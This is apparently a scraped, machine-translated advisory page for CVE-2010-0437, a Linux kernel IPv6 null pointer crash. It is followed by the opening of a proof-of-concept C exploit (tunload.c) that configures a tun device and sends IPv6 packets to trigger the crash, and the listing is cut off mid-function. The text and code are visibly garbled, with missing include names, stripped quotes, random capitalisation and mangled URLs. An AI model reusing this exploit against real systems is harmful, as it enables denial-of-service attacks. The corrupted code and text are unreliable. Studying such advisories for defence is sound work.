Affected Version: Linuxkernel2.6.x vulnerability Description: CVE (CAN) ID: CVE-2010-0437LinuxKernel is the open source operating system Linux kernel. The ip6_dst_lookup_tail () function of LinuxKernel has the Null Pointer Reference Vulnerability. Attackers on the local network can trigger this vulnerability by sending IPv6 communication to the target system.
Affected Versions:
Linux kernel 2.6.x vulnerability description:
CVE (CAN) ID: CVE-2010-0437
Linux Kernel is the Kernel used by open source Linux.
Linux Kernel ip6_dst _LookThe up_tail () function has the Null Pointer Reference Vulnerability. Attackers on the local network can trigger this vulnerability by sending IPv6 communication to the target system. If the destination system dst> neighbor is empty when an IPv6 packet is received, system Crash <* Reference
Https://bugzilla.rEdHat.com/show_bug.cgi? FoRmAt = multiple &Id= 563781
Https://bugzilla.kernel.org/show_bug.cgi? Format = multiple & amp; id = 11469
Https://www.redhat.com/SuPport/errata/RHSA-2010-0149.html
Https://www.redhat.com/support/errata/RHSA-2010-0148.html
Https://www.redhat.com/support/errata/RHSA-2010-0147.html
*>
Test method:
[Www.linuxso.com]
The Program (method) provided on this site may be offensive and only used for security research and teaching. You are at your own risk! /* Gcc-std = gnu99-O2-g-lpthread-lrt tunload. c-o tunload */
/*************************************** **************************************
* Copyright (C) 2008 Remi Denis-Courmont. All rights reserved .*
**
* RedisTrIbution and use in source and binary forms, with or *
* ModifiCatIon, are permitted provided that the above copyright notice is *
* Retained and/or reproDuCed in the documentation provided with *
* Distribution .*
**
* ToExTent permitted by law, this software is provided with no *
*ExprEss or implied warranties of any kind .*
* The situation as regards scientific and technical know-how atTime*
* When this software was distributed did notEnableAll possible uses to be *
* Tested and verified, nor for the preseNcE of any or all faults to be *
* Detected. In this respect, people's attention is drawn to the risks *
* Associated with loading, using, modifying and/or develoPingAnd *
* Reproducing this software .*
* The user shall be responsible for verifying, by any or all means, *
* Software's suitability for its requirements, its due and proper *
* Functioning, and for ensuring that it shall not cause damage to either *
* Persons or property .*
**
* The author does not warrant that this software does not infringe any or *
* All intellectual right relating to a patent, a design or a trademark .*
* Moreover, the author shall not hold someone harmLessAgainst any or all *
* Proceedings for infringement that may be instituted in respect of *
* Use, modification and redistrbution of this software .*
**************************************** *************************************/
# Define _ GNU_SOURCE 1
# Include
# Include
# Include
# Include
# Include
# Include
# Include Stat. H>
# Include
# Include
# Include
# Include
# Include
# Include
# Include
Static void run (const char * Fmt,...)
{
Va_list ap;
Char * cmd;
Va_start (ap, fmt );
Vasprintf (& cmd, fmt, ap );
Va_end (ap );
System (cmd );
Free(Cmd );
}
Static int tun_open (void)
{
Struct ifreq req;
Int fd = open (/dev/net/tun, O_RDWR );
If (fd =-1)
Return-1;
Mem Set(& Req, 0, sizeof (req ));
Req. ifr_flags = IFF_TUN;
If (ioctl (fd, TUNSETIFF, & req ))
{
(Void) close (fd );
Return-1;
}
Run (ip link set dev % s up, req. ifr_name );
Run (ip-6 DdRess add fd34: 5678: 9abc: def0: 1/64 dev % s,
Req. ifr_name );
Return fd;
}
Static unsigned rcvd;
Static int tun;
Static void cleanup_fd (void * data)
{
(Void) close (intptr_t) data );
}
Static void * thread (void * data)
{
Unsigned n = (uintptr_t) data;
Struct sockaddr_in6 dst;
Uint16_t tunhead [2];
Int fd = socket (PF_INET6, SOCK_DGRAM, 0 );